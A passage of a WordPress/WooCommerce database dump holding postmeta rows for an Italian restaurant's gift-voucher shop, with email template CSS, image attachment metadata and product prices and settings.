div[style*=\"margin: 16px 0\"]{margin:0 !important;}/* What it does: Stops Outlook from adding extra spacing to tables. */ table, td{mso-table-lspace: 0pt !important; mso-table-rspace: 0pt !important;}/* What it does: Fixes webkit padding issue. Fix for Yahoo mail table alignment bug. Applies table-layout to the first 2 tables then removes for anything nested deeper. */ table{border-spacing: 0 !important; border-collapse: collapse !important; table-layout: fixed !important; margin: 0 auto !important;}table table table{table-layout: auto;}/* What it does: Uses a better rendering method when resizing images in IE. */ img{-ms-interpolation-mode:bicubic;}/* What it does: A work-around for iOS meddling in triggered links. */ .mobile-link--footer a, a[x-apple-data-detectors]{color:inherit !important; text-decoration: underline !important;}/* What it does: Prevents underlining the button text in Windows 10 */ .button-link{text-decoration: none !important;}.button-td, .button-a{transition: all 100ms ease-in;}.button-td:hover, .button-a:hover{background: #555555 !important; border-color: #555555 !important;}.feature_image img{display: block; margin: 0 auto; max-width: 550px; width: 100%;}'),(6004,458,'_thumbnail_id','443'),(6005,459,'mwb_css_field','html, body{margin: 0 auto !important; padding: 0 !important; height: 100% !important; width: 100% !important;}/* What it does: Stops email clients resizing small text. */ *{-ms-text-size-adjust: 100%; -webkit-text-size-adjust: 100%;}/* What is does: Centers email on Android 4.4 */ div[style*=\"margin: 16px 0\"]{margin:0 !important;}/* What it does: Stops Outlook from adding extra spacing to tables. */ table, td{mso-table-lspace: 0pt !important; mso-table-rspace: 0pt !important;}/* What it does: Fixes webkit padding issue. Fix for Yahoo mail table alignment bug. Applies table-layout to the first 2 tables then removes for anything nested deeper. */ table{border-spacing: 0 !important; border-collapse: collapse !important; table-layout: fixed !important; margin: 0 auto !important;}table table table{table-layout: auto;}/* What it does: Uses a better rendering method when resizing images in IE. */ img{-ms-interpolation-mode:bicubic;}/* What it does: A work-around for iOS meddling in triggered links. */ .mobile-link--footer a, a[x-apple-data-detectors]{color:inherit !important; text-decoration: underline !important;}/* What it does: Prevents underlining the button text in Windows 10 */ .button-link{text-decoration: none !important;}.button-td, .button-a{transition: all 100ms ease-in;}.button-td:hover, .button-a:hover{background: #555555 !important; border-color: #555555 !important;}span.feature_img img{width: 70%;}'),(6006,459,'_thumbnail_id','444'),(6007,460,'mwb_css_field','html, body{margin: 0 auto !important; padding: 0 !important; height: 100% !important; width: 100% !important;}/* What it does: Stops email clients resizing small text. */ *{-ms-text-size-adjust: 100%; -webkit-text-size-adjust: 100%;}/* What is does: Centers email on Android 4.4 */ div[style*=\"margin: 16px 0\"]{margin:0 !important;}/* What it does: Stops Outlook from adding extra spacing to tables. */ table, td{mso-table-lspace: 0pt !important; mso-table-rspace: 0pt !important;}/* What it does: Fixes webkit padding issue. Fix for Yahoo mail table alignment bug. Applies table-layout to the first 2 tables then removes for anything nested deeper. */ table{border-spacing: 0 !important; border-collapse: collapse !important; table-layout: fixed !important; margin: 0 auto !important;}table table table{table-layout: auto;}/* What it does: Uses a better rendering method when resizing images in IE. */ img{-ms-interpolation-mode:bicubic;}/* What it does: A work-around for iOS meddling in triggered links. */ .mobile-link--footer a, a[x-apple-data-detectors]{color:inherit !important; text-decoration: underline !important;}/* What it does: Prevents underlining the button text in Windows 10 */ .button-link{text-decoration: none !important;}.button-td, .button-a{transition: all 100ms ease-in;}.button-td:hover, .button-a:hover{background: #555555 !important; border-color: #555555 !important;}.feature_img{max-width: 600px;}'),(6008,460,'_thumbnail_id','445'),(6009,461,'mwb_css_field','html, body{margin: 0 auto !important; padding: 0 !important; height: 100% !important; width: 100% !important;}/* What it does: Stops email clients resizing small text. */ *{-ms-text-size-adjust: 100%; -webkit-text-size-adjust: 100%;}/* What is does: Centers email on Android 4.4 */ div[style*=\"margin: 16px 0\"]{margin:0 !important;}/* What it does: Stops Outlook from adding extra spacing to tables. */ table, td{mso-table-lspace: 0pt !important; mso-table-rspace: 0pt !important;}/* What it does: Fixes webkit padding issue. Fix for Yahoo mail table alignment bug. Applies table-layout to the first 2 tables then removes for anything nested deeper. */ table{border-spacing: 0 !important; border-collapse: collapse !important; table-layout: fixed !important; margin: 0 auto !important;}table table table{table-layout: auto;}/* What it does: Uses a better rendering method when resizing images in IE. */ img{-ms-interpolation-mode:bicubic;}/* What it does: A work-around for iOS meddling in triggered links. */ .mobile-link--footer a, a[x-apple-data-detectors]{color:inherit !important; text-decoration: underline !important;}/* What it does: Prevents underlining the button text in Windows 10 */ .button-link{text-decoration: none !important;}.button-td, .button-a{transition: all 100ms ease-in;}.button-td:hover, .button-a:hover{background: #555555 !important; border-color: #555555 !important;}.feature_img > img{display: block; margin: 0 auto; max-width: 400px; width: 50%;}'),(6010,461,'_thumbnail_id','446'),(6011,462,'mwb_css_field','html, body{margin: 0 auto !important; padding: 0 !important; height: 100% !important; width: 100% !important;}/* What it does: Stops email clients resizing small text. */ *{-ms-text-size-adjust: 100%; -webkit-text-size-adjust: 100%;}/* What is does: Centers email on Android 4.4 */ div[style*=\"margin: 16px 0\"]{margin:0 !important;}/* What it does: Stops Outlook from adding extra spacing to tables. */ table, td{mso-table-lspace: 0pt !important; mso-table-rspace: 0pt !important;}/* What it does: Fixes webkit padding issue. Fix for Yahoo mail table alignment bug. Applies table-layout to the first 2 tables then removes for anything nested deeper. */ table{border-spacing: 0 !important; border-collapse: collapse !important; table-layout: fixed !important; margin: 0 auto !important;}table table table{table-layout: auto;}/* What it does: Uses a better rendering method when resizing images in IE. */ img{-ms-interpolation-mode:bicubic;}/* What it does: A work-around for iOS meddling in triggered links. */ .mobile-link--footer a, a[x-apple-data-detectors]{color:inherit !important; text-decoration: underline !important;}/* What it does: Prevents underlining the button text in Windows 10 */ .button-link{text-decoration: none !important;}.button-td, .button-a{transition: all 100ms ease-in;}.button-td:hover, .button-a:hover{background: #555555 !important; border-color: #555555 !important;}.feature_img > img{display: block; margin: 0 auto; max-width: 400px; width: 100%;}'),(6012,462,'_thumbnail_id','447'),(6013,463,'mwb_css_field','html, body{margin: 0 auto !important; padding: 0 !important; height: 100% !important; width: 100% !important;}/* What it does: Stops email clients resizing small text. */ *{-ms-text-size-adjust: 100%; -webkit-text-size-adjust: 100%;}/* What is does: Centers email on Android 4.4 */ div[style*=\"margin: 16px 0\"]{margin:0 !important;}/* What it does: Stops Outlook from adding extra spacing to tables. */ table, td{mso-table-lspace: 0pt !important; mso-table-rspace: 0pt !important;}/* What it does: Fixes webkit padding issue. Fix for Yahoo mail table alignment bug. Applies table-layout to the first 2 tables then removes for anything nested deeper. */ table{border-spacing: 0 !important; border-collapse: collapse !important; table-layout: fixed !important; margin: 0 auto !important;}table table table{table-layout: auto;}/* What it does: Uses a better rendering method when resizing images in IE. */ img{-ms-interpolation-mode:bicubic;}/* What it does: A work-around for iOS meddling in triggered links. */ .mobile-link--footer a, a[x-apple-data-detectors]{color:inherit !important; text-decoration: underline !important;}/* What it does: Prevents underlining the button text in Windows 10 */ .button-link{text-decoration: none !important;}.button-td, .button-a{transition: all 100ms ease-in;}.button-td:hover, .button-a:hover{background: #555555 !important; border-color: #555555 !important;}.feature_img > img{display: block; margin: 0 auto; max-width: 400px; width: 50%;}table.email-container{border: solid 1px #ccc !important;}'),(6014,463,'_thumbnail_id','448'),(6015,464,'mwb_css_field','html, body{margin: 0 auto !important; padding: 0 !important; height: 100% !important; width: 100% !important;}/* What it does: Stops email clients resizing small text. */ *{-ms-text-size-adjust: 100%; -webkit-text-size-adjust: 100%;}/* What is does: Centers email on Android 4.4 */ div[style*=\"margin: 16px 0\"]{margin:0 !important;}/* What it does: Stops Outlook from adding extra spacing to tables. */ table, td{mso-table-lspace: 0pt !important; mso-table-rspace: 0pt !important;}/* What it does: Fixes webkit padding issue. Fix for Yahoo mail table alignment bug. Applies table-layout to the first 2 tables then removes for anything nested deeper. */ table{border-spacing: 0 !important; border-collapse: collapse !important; table-layout: fixed !important; margin: 0 auto !important;}table table table{table-layout: auto;}/* What it does: Uses a better rendering method when resizing images in IE. */ img{-ms-interpolation-mode:bicubic;}/* What it does: A work-around for iOS meddling in triggered links. */ .mobile-link--footer a, a[x-apple-data-detectors]{color:inherit !important; text-decoration: underline !important;}/* What it does: Prevents underlining the button text in Windows 10 */ .button-link{text-decoration: none !important;}.button-td, .button-a{transition: all 100ms ease-in;}.button-td:hover, .button-a:hover{background: #555555 !important; border-color: #555555 !important;}span.feature_img img{width: 100%; height: 440px;}'),(6016,464,'_thumbnail_id','449'),(6017,465,'mwb_css_field','html,body{margin: 0 auto !important;padding: 0 !important;height: 100% !important;width: 100% !important;}/* What it does: Stops email clients resizing small text. */*{-ms-text-size-adjust: 100%;-webkit-text-size-adjust: 100%;}/* What is does: Centers email on Android 4.4 */div[style*=\'margin: 16px 0\']{margin:0 !important;}/* What it does: Stops Outlook from adding extra spacing to tables. */table,td{mso-table-lspace: 0pt !important;mso-table-rspace: 0pt !important;}/* What it does: Fixes webkit padding issue. Fix for Yahoo mail table alignment bug. Applies table-layout to the first 2 tables then removes for anything nested deeper. */table{border-spacing: 0 !important;border-collapse: collapse !important;table-layout: fixed !important;margin: 0 auto !important;}table table table{table-layout: auto;}/* What it does: Uses a better rendering method when resizing images in IE. */img{-ms-interpolation-mode:bicubic;}/* What it does: A work-around for iOS meddling in triggered links. */.mobile-link--footer a,a[x-apple-data-detectors]{color:inherit !important;text-decoration: underline !important;}/* What it does: Prevents underlining the button text in Windows 10 */.button-link{text-decoration: none !important;}.mwb_coupon_section{text-align: center;background-position: center center !important;background-size: cover !important; padding-top: 27px;padding-bottom:27px;}@media screen and (max-width: 600px){.email-container{width: 100% !important;margin: auto !important;}/* What it does: Forces elements to resize to the full width of their container. Useful for resizing images beyond their max-width. */.fluid{max-width: 100% !important;height: auto !important;margin-left: auto !important;margin-right: auto !important;}/* What it does: Generic utility class for centering. Useful for images, buttons, and nested tables. */.center-on-narrow{display: block !important;margin-left: auto !important;margin-right: auto !important;float: none !important;}table.center-on-narrow{display: inline-block !important;}}@media screen and (max-width: 480px){/* What it does: Forces table cells into full-width rows. */.stack-column,.stack-column-center{display: block !important;width: 100% !important;max-width: 100% !important;direction: ltr !important;}/* And center justify these ones. */.stack-column-center{text-align: center !important;}}.img-block > img{max-width: 300px; width: 100%;}'),(6018,465,'_thumbnail_id','450'),(6019,466,'mwb_css_field','html,body{margin: 0 auto !important; padding: 0 !important; height: 100% !important;width: 100% !important;}/* What it does: Stops email clients resizing small text. */ *{-ms-text-size-adjust: 100%;-webkit-text-size-adjust: 100%;}/* What is does: Centers email on Android 4.4 */ div[style*=\'margin: 16px 0\']{margin:0 !important;}/* What it does: Stops Outlook from adding extra spacing to tables. */ table,td{mso-table-lspace: 0pt !important;mso-table-rspace: 0pt !important;}table{border-spacing: 0 !important;border-collapse: collapse !important; table-layout: fixed !important;margin: 0 auto !important;}table table table{table-layout: auto;}/* What it does: Uses a better rendering method when resizing images in IE. */ img{-ms-interpolation-mode:bicubic;}/* What it does: A work-around for iOS meddling in triggered links. */ .mobile-link--footer a,a[x-apple-data-detectors]{color:inherit !important;text-decoration: underline !important;}/* What it does: Prevents underlining the button text in Windows 10 */.button-link{text-decoration: none !important;}.mwb_coupon_section{text-align: center; padding-top: 27px; padding-bottom:27px; padding: 15px 0px;}@media screen and (max-width: 600px){.email-container{width: 100% !important; margin: auto !important;}.fluid{max-width: 100% !important; height: auto !important; margin-left: auto !important; margin-right: auto !important;}/* What it does: Generic utility class for centering. Useful for images, buttons, and nested tables. */ .center-on-narrow{text-align: center !important;display: block !important; margin-left: auto !important; margin-right: auto !important; float: none !important;}table.center-on-narrow{display: inline-block !important;}}@media screen and (max-width: 480px){/* What it does: Forces table cells into full-width rows. */ .stack-column,.stack-column-center{display: block !important; width: 100% !important;max-width: 100% !important;direction: ltr !important;}/* And center justify these ones. */.stack-column-center{text-align: center !important;}}'),(6020,466,'_thumbnail_id','451'),(6021,453,'_edit_lock','1499791018:1'),(6022,453,'_edit_last','1'),(6023,435,'_thumbnail_id','470'),(6024,435,'mwb_wgm_discount','no'),(6025,435,'mwb_wgm_exclude_per_product',''),(6026,435,'mwb_wgm_exclude_per_category','a:0:{}'),(6027,465,'_edit_lock','1499791101:1'),(6028,468,'_edit_lock','1544818178:1'),(6029,468,'_edit_last','1'),(6030,468,'mwb_css_field',''),(6031,470,'_wp_attached_file','2017/07/be-the-reason.jpg'),(6032,470,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:564;s:6:\"height\";i:415;s:4:\"file\";s:25:\"2017/07/be-the-reason.jpg\";s:5:\"sizes\";a:11:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:25:\"be-the-reason-300x375.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:375;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:25:\"be-the-reason-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:25:\"be-the-reason-300x221.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:221;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:25:\"be-the-reason-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:25:\"be-the-reason-300x221.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:221;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:25:\"be-the-reason-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:25:\"be-the-reason-300x375.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:375;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:19:\"sydney-medium-thumb\";a:4:{s:4:\"file\";s:25:\"be-the-reason-550x400.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"sydney-small-thumb\";a:4:{s:4:\"file\";s:25:\"be-the-reason-230x169.jpg\";s:5:\"width\";i:230;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"sydney-service-thumb\";a:4:{s:4:\"file\";s:25:\"be-the-reason-350x258.jpg\";s:5:\"width\";i:350;s:6:\"height\";i:258;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"sydney-mas-thumb\";a:4:{s:4:\"file\";s:25:\"be-the-reason-480x353.jpg\";s:5:\"width\";i:480;s:6:\"height\";i:353;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(6033,471,'_wp_attached_file','2017/07/do-small-thing.png'),(6034,471,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:300;s:6:\"height\";i:409;s:4:\"file\";s:26:\"2017/07/do-small-thing.png\";s:5:\"sizes\";a:9:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:26:\"do-small-thing-300x375.png\";s:5:\"width\";i:300;s:6:\"height\";i:375;s:9:\"mime-type\";s:9:\"image/png\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:26:\"do-small-thing-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:26:\"do-small-thing-300x409.png\";s:5:\"width\";i:300;s:6:\"height\";i:409;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:26:\"do-small-thing-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:26:\"do-small-thing-220x300.png\";s:5:\"width\";i:220;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:26:\"do-small-thing-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:26:\"do-small-thing-300x375.png\";s:5:\"width\";i:300;s:6:\"height\";i:375;s:9:\"mime-type\";s:9:\"image/png\";s:9:\"uncropped\";b:0;}s:19:\"sydney-medium-thumb\";a:4:{s:4:\"file\";s:26:\"do-small-thing-300x400.png\";s:5:\"width\";i:300;s:6:\"height\";i:400;s:9:\"mime-type\";s:9:\"image/png\";}s:18:\"sydney-small-thumb\";a:4:{s:4:\"file\";s:26:\"do-small-thing-230x314.png\";s:5:\"width\";i:230;s:6:\"height\";i:314;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(6049,472,'_sku','regalacena-creativo-con-bevande'),(6050,472,'_regular_price','125'),(6051,472,'_sale_price',''),(6052,472,'_sale_price_dates_from',''),(6053,472,'_sale_price_dates_to',''),(6054,472,'total_sales','15'),(6055,472,'_tax_status','taxable'),(6056,472,'_tax_class',''),(6057,472,'_manage_stock','no'),(6058,472,'_backorders','no'),(6059,472,'_sold_individually','no'),(6060,472,'_weight',''),(6061,472,'_length',''),(6062,472,'_width',''),(6063,472,'_height',''),(6064,472,'_upsell_ids','a:0:{}'),(6065,472,'_crosssell_ids','a:0:{}'),(6066,472,'_purchase_note','Escluso bevande'),(6067,472,'_default_attributes','a:0:{}'),(6068,472,'_virtual','no'),(6069,472,'_downloadable','no'),(6070,472,'_product_image_gallery',''),(6071,472,'_download_limit','-1'),(6072,472,'_download_expiry','-1'),(6073,472,'_thumbnail_id','470'),(6074,472,'_stock',NULL),(6075,472,'_stock_status','instock'),(6076,472,'_wc_average_rating','0'),(6077,472,'_wc_rating_count','a:0:{}'),(6078,472,'_wc_review_count','0'),(6079,472,'_downloadable_files','a:0:{}'),(6080,472,'_product_attributes','a:0:{}'),(6081,472,'_product_version','3.6.5'),(6082,472,'_price','125'),(6083,472,'mwb_wgm_pricing','a:3:{s:13:\"default_price\";s:3:\"125\";s:4:\"type\";s:21:\"mwb_wgm_default_price\";s:8:\"template\";s:3:\"468\";}'),(6084,472,'mwb_wgm_overwrite','yes'),(6085,472,'mwb_wgm_email_to_recipient','yes'),(6086,472,'mwb_wgm_download','yes'),(6087,472,'_yoast_wpseo_primary_product_cat','23'),(6088,472,'_yoast_wpseo_content_score','90'),(6089,472,'mwb_wgm_discount','no'),(6090,472,'_edit_lock','1563304270:1'),(6091,472,'_edit_last','1'),(6092,472,'mwb_wgm_shipping',NULL),(6093,472,'mwb_wgm_exclude_per_product',''),(6094,472,'mwb_wgm_exclude_per_category',''),(6095,472,'_wp_old_slug','menu-creativo-per-2-persone-con-bevande'),(6096,473,'_wp_attached_file','2017/07/buono.png'),(6097,473,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:172;s:6:\"height\";i:108;s:4:\"file\";s:17:\"2017/07/buono.png\";s:5:\"sizes\";a:2:{s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:17:\"buono-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:17:\"buono-150x108.png\";s:5:\"width\";i:150;s:6:\"height\";i:108;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(6098,468,'_thumbnail_id','473'),(6099,474,'_sku','regalacena-storico'),(6100,474,'_regular_price','93'),(6101,474,'_sale_price',''),(6102,474,'_sale_price_dates_from',''),(6103,474,'_sale_price_dates_to',''),(6104,474,'total_sales','2'),(6105,474,'_tax_status','taxable'),(6106,474,'_tax_class',''),(6107,474,'_manage_stock','no'),(6108,474,'_backorders','no'),(6109,474,'_sold_individually','no'),(6110,474,'_weight',''),(6111,474,'_length',''),(6112,474,'_width',''),(6113,474,'_height',''),(6114,474,'_upsell_ids','a:0:{}'),(6115,474,'_crosssell_ids','a:0:{}'),(6116,474,'_purchase_note','Escluso bevande'),(6117,474,'_default_attributes','a:0:{}'),(6118,474,'_virtual','no'),(6119,474,'_downloadable','no'),(6120,474,'_product_image_gallery',''),(6121,474,'_download_limit','-1'),(6122,474,'_download_expiry','-1'),(6123,474,'_thumbnail_id','470'),(6124,474,'_stock',NULL),(6125,474,'_stock_status','instock'),(6126,474,'_wc_average_rating','0'),(6127,474,'_wc_rating_count','a:0:{}'),(6128,474,'_wc_review_count','0'),(6129,474,'_downloadable_files','a:0:{}'),(6130,474,'_product_attributes','a:0:{}'),(6131,474,'_product_version','3.6.5'),(6132,474,'_price','93'),(6133,474,'mwb_wgm_pricing','a:4:{s:13:\"default_price\";s:2:\"93\";s:4:\"type\";s:21:\"mwb_wgm_default_price\";s:8:\"template\";a:1:{i:0;s:3:\"468\";}s:14:\"by_default_tem\";b:1;}'),(6134,474,'mwb_wgm_overwrite','yes'),(6135,474,'mwb_wgm_email_to_recipient','yes'),(6136,474,'mwb_wgm_download','yes'),(6137,474,'_yoast_wpseo_primary_product_cat','23'),(6138,474,'_yoast_wpseo_content_score','90'),(6139,474,'mwb_wgm_discount','no'),(6140,474,'_edit_lock','1563304504:1'),(6141,474,'_edit_last','1'),(6142,474,'mwb_wgm_shipping',NULL),(6143,474,'mwb_wgm_exclude_per_product',''),(6144,474,'mwb_wgm_exclude_per_category','a:0:{}'),(6145,475,'_sku','gift-card-50'),(6146,475,'_regular_price','115'),(6147,475,'_sale_price',''),(6148,475,'_sale_price_dates_from',''),(6149,475,'_sale_price_dates_to',''),(6150,475,'total_sales','9'),(6151,475,'_tax_status','taxable'),(6152,475,'_tax_class',''),(6153,475,'_manage_stock','no'),(6154,475,'_backorders','no'),(6155,475,'_sold_individually','no'),(6156,475,'_weight',''),(6157,475,'_length',''),(6158,475,'_width',''),(6159,475,'_height',''),(6160,475,'_upsell_ids','a:0:{}'),(6161,475,'_crosssell_ids','a:0:{}'),(58483,475,'slide_template',''),(6163,475,'_default_attributes','a:0:{}'),(6164,475,'_virtual','no'),(6165,475,'_downloadable','no'),(6166,475,'_product_image_gallery',''),(6167,475,'_download_limit','-1'),(6168,475,'_download_expiry','-1'),(6169,475,'_thumbnail_id','470'),(6170,475,'_stock',NULL),(6171,475,'_stock_status','instock'),(6172,475,'_wc_average_rating','0'),(6173,475,'_wc_rating_count','a:0:{}'),(6174,475,'_wc_review_count','0'),(6175,475,'_downloadable_files','a:0:{}'),(6176,475,'_product_attributes','a:0:{}'),(6177,475,'_product_version','4.9.2'),(6178,475,'_price','115'),(6179,475,'mwb_wgm_pricing','a:4:{s:13:\"default_price\";s:3:\"115\";s:4:\"type\";s:21:\"mwb_wgm_default_price\";s:8:\"template\";a:1:{i:0;s:3:\"468\";}s:14:\"by_default_tem\";b:1;}'),(6180,475,'mwb_wgm_overwrite','yes'),(6181,475,'mwb_wgm_email_to_recipient','yes'),(6182,475,'mwb_wgm_download','yes'),(6183,475,'_yoast_wpseo_primary_product_cat','23'),(6184,475,'_yoast_wpseo_content_score','30'),(6185,475,'mwb_wgm_discount','no'),(6186,475,'_edit_lock','1611925062:1'),(6187,475,'_edit_last','1'),(6188,475,'mwb_wgm_shipping',NULL),(6189,475,'mwb_wgm_exclude_per_product',''),(6190,475,'mwb_wgm_exclude_per_category','a:0:{}'),(6191,476,'_edit_lock','1500189107:1'),(6192,476,'_edit_last','1'),(6193,476,'_thumbnail_id','470'),(6194,476,'_wp_page_template','default'),(6195,476,'_yoast_wpseo_content_score','90'),(6254,482,'_wc_review_count','0'),(6255,482,'_wc_rating_count','a:0:{}'),(6256,482,'_wc_average_rating','0'),(6257,482,'_edit_lock','1500187987:1'),(6258,482,'_edit_last','1'),(6259,482,'_thumbnail_id','470'),(6260,482,'_sku','acquisto-cena-menu-creativo'),(6261,482,'_regular_price','98'),(6262,482,'_sale_price',''),(6263,482,'_sale_price_dates_from',''),(6264,482,'_sale_price_dates_to',''),(6265,482,'total_sales','0'),(6266,482,'_tax_status','taxable'),(6267,482,'_tax_class',''),(6268,482,'_manage_stock','no'),(6269,482,'_backorders','no'),(6270,482,'_sold_individually','no'),(6271,482,'_weight',''),(6272,482,'_length',''),(6273,482,'_width',''),(6274,482,'_height',''),(6275,482,'_upsell_ids','a:0:{}'),(6276,482,'_crosssell_ids','a:0:{}'),(6277,482,'_purchase_note','Escluso bevande'),(6278,482,'_default_attributes','a:0:{}'),(6279,482,'_virtual','yes'),(6280,482,'_downloadable','no'),(6281,482,'_product_image_gallery',''),(6282,482,'_download_limit','-1'),(6283,482,'_download_expiry','-1'),(6284,482,'_stock',NULL),(6285,482,'_stock_status','outofstock'),(6286,482,'_product_version','3.2.5'),(6287,482,'_price','98'),(6288,482,'_yoast_wpseo_primary_product_cat','26'),(6289,482,'_yoast_wpseo_content_score','30'),(6290,483,'_sku','acquisto-cena-menu-creativo-con-bevande'),(6291,483,'_regular_price','120'),(6292,483,'_sale_price',''),(6293,483,'_sale_price_dates_from',''),(6294,483,'_sale_price_dates_to',''),(6295,483,'total_sales','0'),(6296,483,'_tax_status','taxable'),(6297,483,'_tax_class',''),(6298,483,'_manage_stock','no'),(6299,483,'_backorders','no'),(6300,483,'_sold_individually','no'),(6301,483,'_weight',''),(6302,483,'_length',''),(6303,483,'_width',''),(6304,483,'_height',''),(6305,483,'_upsell_ids','a:0:{}'),(6306,483,'_crosssell_ids','a:0:{}'),(6307,483,'_purchase_note',''),(6308,483,'_default_attributes','a:0:{}'),(6309,483,'_virtual','yes'),(6310,483,'_downloadable','no'),(6311,483,'_product_image_gallery',''),(6312,483,'_download_limit','-1'),(6313,483,'_download_expiry','-1'),(6314,483,'_thumbnail_id','470'),(6315,483,'_stock',NULL),(6316,483,'_stock_status','outofstock'),(6317,483,'_wc_average_rating','0'),(6318,483,'_wc_rating_count','a:0:{}'),(6319,483,'_wc_review_count','0'),(6320,483,'_downloadable_files','a:0:{}'),(6321,483,'_product_attributes','a:0:{}'),(6322,483,'_product_version','3.2.5'),(6323,483,'_price','120'),(6324,483,'_yoast_wpseo_primary_product_cat','26'),(6325,483,'_yoast_wpseo_content_score','60'),(6326,483,'_edit_lock','1500188326:1'),(6327,483,'_edit_last','1'),(6328,484,'_sku','acquisto-cena-menu-storico'),(6329,484,'_regular_price','90'),(6330,484,'_sale_price',''),(6331,484,'_sale_price_dates_from',''),(6332,484,'_sale_price_dates_to',''),(6333,484,'total_sales','0'),(6334,484,'_tax_status','taxable'),(6335,484,'_tax_class',''),(6336,484,'_manage_stock','no'),(6337,484,'_backorders','no'),(6338,484,'_sold_individually','no'),(6339,484,'_weight',''),(6340,484,'_length',''),(6341,484,'_width',''),(6342,484,'_height',''),(6343,484,'_upsell_ids','a:0:{}'),(6344,484,'_crosssell_ids','a:0:{}'),(6345,484,'_purchase_note','Escluso bevande'),(6346,484,'_default_attributes','a:0:{}'),(6347,484,'_virtual','yes'),(6348,484,'_downloadable','no'),(6349,484,'_product_image_gallery',''),(6350,484,'_download_limit','-1'),(6351,484,'_download_expiry','-1'),(6352,484,'_thumbnail_id','470'),(6353,484,'_stock',NULL),(6354,484,'_stock_status','outofstock'),(6355,484,'_wc_average_rating','0'),(6356,484,'_wc_rating_count','a:0:{}'),(6357,484,'_wc_review_count','0'),(6358,484,'_downloadable_files','a:0:{}'),(6359,484,'_product_attributes','a:0:{}'),(6360,484,'_product_version','3.2.5'),(6361,484,'_price','90'),(6362,484,'_yoast_wpseo_primary_product_cat','26'),(6363,484,'_yoast_wpseo_content_score','30'),(6364,484,'_edit_lock','1500188172:1'),(6365,484,'_edit_last','1'),(6366,484,'_wp_old_slug','acquista-pranzocena-menu-storico-per-2-persone-copia'),(6367,485,'_sku','acquisto-cena-menu-storico-con-bevande'),(6368,485,'_regular_price','115'),(6369,485,'_sale_price',''),(6370,485,'_sale_price_dates_from',''),(6371,485,'_sale_price_dates_to',''),(6372,485,'total_sales','0'),(6373,485,'_tax_status','taxable'),(6374,485,'_tax_class',''),(6375,485,'_manage_stock','no'),(6376,485,'_backorders','no'),(6377,485,'_sold_individually','no'),(6378,485,'_weight','